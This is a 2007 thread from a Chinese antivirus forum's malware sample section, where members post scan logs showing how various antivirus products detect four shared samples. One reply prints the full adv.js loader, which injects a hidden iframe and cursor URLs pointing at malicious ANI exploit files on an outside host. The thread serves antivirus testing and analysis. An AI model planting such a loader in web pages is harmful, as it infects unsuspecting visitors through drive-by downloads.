查看: 3310|回复: 12
收起左侧

[病毒样本] 再来四个~~

[复制链接]
tonger2003
发表于 2007-4-7 01:22:46 | 显示全部楼层 |阅读模式
1010

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
小邪邪
发表于 2007-4-7 01:26:00 | 显示全部楼层
AVK通杀
欠妳緈諨
发表于 2007-4-7 01:33:08 | 显示全部楼层
avast!漏掉第二个,其余三个下载即报警

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
The EQs
发表于 2007-4-7 01:33:34 | 显示全部楼层

漏掉一个

Scan performed at: 2007-4-7 1:33:49
Scanning Log
NOD32 version 2171 (20070406) NT
Command line: C:\Documents and Settings\EQ2\桌面\muxiao2.rar C:\Documents and Settings\EQ2\桌面\0.rar C:\Documents and Settings\EQ2\桌面\adv.rar C:\Documents and Settings\EQ2\桌面\muxiao1.rar
Operating memory - is OK

Date: 7.4.2007  Time: 01:33:52
Anti-Stealth technology is enabled.
Scanned disks, folders and files: C:\Documents and Settings\EQ2\桌面\muxiao2.rar; C:\Documents and Settings\EQ2\桌面\0.rar; C:\Documents and Settings\EQ2\桌面\adv.rar; C:\Documents and Settings\EQ2\桌面\muxiao1.rar
C:\Documents and Settings\EQ2\桌面\muxiao2.rar ?RAR ?muxiao2.jpg - a variant of Win32/TrojanDownloader.Ani.Gen trojan
C:\Documents and Settings\EQ2\桌面\0.rar ?RAR ?0.exe - Win32/Pacex.Gen virus
C:\Documents and Settings\EQ2\桌面\muxiao1.rar ?RAR ?muxiao1.jpg - a variant of Win32/TrojanDownloader.Ani.Gen trojan
Number of scanned files: 8
Number of threats found: 3
Number of files cleaned: 3
Time of completion: 01:33:53 Total scanning time: 1 sec (00:00:01)
欠妳緈諨
发表于 2007-4-7 01:35:13 | 显示全部楼层
昨天刚换回avast!,看来新版本在样本区表现还凑合 ,现在带着胜利的喜悦去睡觉
剑指七星
发表于 2007-4-7 01:41:34 | 显示全部楼层
漏掉第二个
已检测到: 病毒 Worm.Win32.Viking.ix        URL: http:/bbs.kafan.cn/attachment.php?aid=52940/0.exe
已检测到: 恶意程序 Exploit.Win32.IMG-ANI.k        URL:
已检测到: 恶意程序 Exploit.Win32.IMG-ANI.gen (修改)        URL:
mofunzone
发表于 2007-4-7 02:06:18 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\Documents and Settings\morgan\My Documents\muxiao2.rar'
C:\Documents and Settings\morgan\My Documents\
  muxiao2.rar
    [0] Archive type: RAR
    --> muxiao2.jpg
        [DETECTION] Contains signature of the exploits EXP/Ani.Gen
        [WARNING]   Infected files in archives cannot be repaired!
        [WARNING]   The file was ignored!
Begin scan in 'C:\Documents and Settings\morgan\My Documents\0.rar'
C:\Documents and Settings\morgan\My Documents\
  0.rar
    [0] Archive type: RAR
    --> 0.exe
        [DETECTION] Is the Trojan horse TR/Crypt.NSPM.Gen
        [WARNING]   Infected files in archives cannot be repaired!
        [WARNING]   The file was ignored!
Begin scan in 'C:\Documents and Settings\morgan\My Documents\adv.rar'
C:\Documents and Settings\morgan\My Documents\
  adv.rar
    [0] Archive type: RAR
    --> adv.js
Begin scan in 'C:\Documents and Settings\morgan\My Documents\muxiao1.rar'
C:\Documents and Settings\morgan\My Documents\
  muxiao1.rar
    [0] Archive type: RAR
    --> muxiao1.jpg
        [DETECTION] Contains signature of the exploits EXP/Ani.Gen
        [WARNING]   Infected files in archives cannot be repaired!
        [WARNING]   The file was ignored!
mofunzone
发表于 2007-4-7 02:07:17 | 显示全部楼层
adv.js内容,下那两个ani网马
//读娶src的对象
var v = document.getElementById("advjs");
//读娶src的参数
var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute('src'));

document.write("<iframe src=\"http://web.77276.com/1/"+u_num+".htm\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>");
document.writeln("<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0 Transitional\/\/EN\">");
document.writeln("<HTML><HEAD>");
document.writeln("<META http-equiv=Content-Type content=\"text\/html; charset=big5\">");
document.writeln("<META content=\"MSHTML 6.00.2900.3059\" name=GENERATOR><\/HEAD>");
document.writeln("<BODY> ");
document.writeln("<DIV style=\"CURSOR: url(\'http:\/\/web.77276.com\/muxiao1.jpg\')\">");
document.writeln("<DIV ");
document.writeln("style=\"CURSOR: url(\'http:\/\/web.77276.com\/muxiao2.jpg\')\"><\/DIV><\/DIV><\/BODY><\/HTML>")

//分析src的参数函数
function getUrlParameterAdv(asName,lsURL){

loU = lsURL.split("?");
if (loU.length>1){

  var loallPm = loU[1].split("&");

  for (var i=0; i<loallPm.length; i++){
   var loPm = loallPm.split("=");
   if (loPm[0]==asName){
    if (loPm.length>1){
     return loPm[1];
    }else{
     return "";
    }
   }
  }
}
return null;
}
jlennon
头像被屏蔽
发表于 2007-4-7 03:09:26 | 显示全部楼层
ani的基本都能杀

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
KAV-Longhorn
发表于 2007-4-7 08:31:04 | 显示全部楼层
红伞漏一个,已上报了
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-29 15:31 , Processed in 0.133277 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表